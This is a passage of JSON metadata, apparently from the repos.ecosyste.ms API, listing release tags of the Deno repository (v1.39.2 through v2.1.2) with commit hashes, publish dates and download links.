1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2",